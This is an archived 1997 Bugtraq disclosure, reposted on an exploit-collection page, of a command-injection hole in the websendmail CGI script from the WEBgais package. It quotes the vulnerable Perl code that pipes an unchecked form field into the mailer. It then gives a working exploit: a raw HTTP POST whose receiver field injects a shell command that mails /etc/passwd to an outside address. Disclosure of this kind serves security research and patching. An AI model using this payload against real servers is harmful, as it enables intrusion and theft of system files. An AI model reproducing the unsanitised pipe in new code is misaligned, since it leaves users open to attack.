websendmail cgi hole

Summary
Description:websendmail, a cgi-bin that comes with WEBgais, doesn't make any real attempts to check its input in some cases. Thus you can execute arbitrary commands.
Author:Razvan Dragomirescu <drazvan@kappa.ro>
Compromise:Run arbitrary commands as the user who owns the webserver cgi proccess. (remote)
Vulnerable Systems:Any runnning an unpatched version of websendmail in their cgi directory.
Date:4 July 1997
Details


Date: Fri, 4 Jul 1997 12:16:31 +0300
From: Razvan Dragomirescu <drazvan@kappa.ro>
To: BUGTRAQ@NETSPACE.ORG
Subject: Vulnerability in websendmail

Hi,

Since today is the 4th of July, this one is dedicated to all the American
readers of BUGTRAQ.

I'm surprised this wasn't posted on BUGTRAQ before. (If it's old news I'm
sorry, but I did not find it anywhere else).

So, websendmail is a cgi-bin that comes with the WEBgais package, which is
an interface to the GAIS search tool.
It is a PERL script that reads input from a form and sends e-mail to the
specified destination.
The version I am referring to is 1.0. It was released in 1995 but it is
still used (I've just tested it :) ).

As many other cgi-bin programs, this one does not check for special
characters in the user input.

Here's what it does:
(...)
$cmd="| $MAILBIN $VAR_receiver";
open (PIPEOUT, $cmd);

$VAR_receiver is read from the form. The script also does a little parsing
on the string to "un-webify" it (converts pluses to spaces and %xx
characters to their real value).
So if we set $VAR_receiver to ';mail+BUGTRAQ\@NETSPACE.ORG</etc/passwd;'
it will do the job (some of you know why I used this address ... :) ).

Now for the exploit:

telnet target.machine.com 80
POST /cgi-bin/websendmail HTTP/1.0
Content-length: xxx (should be replaced with the actual length of the
string passed to the server, in this case xxx=90)

receiver=;mail+BUGTRAQ\@NETSPACE.ORG</etc/passwd;&sender=a&rtnaddr=a&subject=a
&content=a

Don't worry if the server displays an error message. The password file is
on the way :).

I think that's all.

Oh, and BTW, if anyone has WebGais installed and working on his computer
and wants to give me a hand in testing some new vulnerability in webgais
(I've found it but I need to test it), please contact me.

And, as always, I'm expecting to hear from you.

Be good.
Razvan

--
Razvan Dragomirescu
drazvan@kappa.ro, drazvan@romania.ro, drazvan@roedu.net
Phone: +40-1-6866621
"Smile, tomorrow will be worse" (Murphy)

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources: